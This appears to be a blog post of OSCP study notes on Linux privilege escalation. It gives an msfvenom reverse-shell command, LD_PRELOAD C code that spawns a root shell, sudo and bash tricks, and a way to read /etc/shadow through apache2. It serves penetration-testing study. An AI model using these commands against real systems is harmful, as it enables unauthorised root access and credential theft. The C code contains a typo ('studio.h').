Privilege Escalation on Linux

Dec 6, 2020 tips linux PrivEsc
Share on:

OSCP Notes

  1. Find executable files with suid or sgid bit set Example: If you have /bin/bash with such permissions, you could easily spawn a root shell with -p option

  2. msfvenom command to generate executable elf file for reverse shell

    1$msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf >revshell.elf

  3. Native revese shells https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

  4. Kernel Exploit suggesion tools

  5. Sudo

    • sudo -l to see what a user can run
    • Try - sudo -i, sudo -s, sudo /bin/bash , sudo passwd

  6. Shell escape - GTFObins

  7. tb3rius notes: apache2 executable can be passed a file with -f option and it prints out the first line (configurations that it cant read). You can pass /etc/shadow to read the root password.

  8. LD_PRELOAD – To exploit, we need env_keep option enabled in sudo config and real id should match effective id of the user. Example preload c program to spawn bash shell -

     1# Create a small C program as below (preload.c)
 2#include <studio.h>
 3#include <sys/types.h>
 4#include <stdlib.h>
 5void _init() {
 6  unsetenv("LD_PRELOAD");
 7  setresuid(0,0,0);
 8  system("/bin/bash -p");
 9}
10
11# gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c
12@ sudo LD_PRELOAD=/tmp/preload.so <command>

  9. LD library path: Similar to above, just run ldd command and identify a shared object (so) that we can load our exploit as. Then set the LD_LIBRARY_PATH as the path in to sudo command.

Labs Linux/Windows PrivEsc workshop - https://github.com/sagishahar/lpeworkshop

  1. Older bash version allow creation of functions with forward slash which take precidence over actual path. Create a function with steps to spawn reverse shell. Also lower than 4.4 inherit PS4 env variable when running as root, so if you set environment variable PS4 as a user, the root execution will inherit and execute it.

  2. NFS enumeration commands on Linux showmount -e nmap -sV -script=nfs-showmount #Mount nfs mount -o rw,vers=2 : no_root_squash setting can disable root squashing.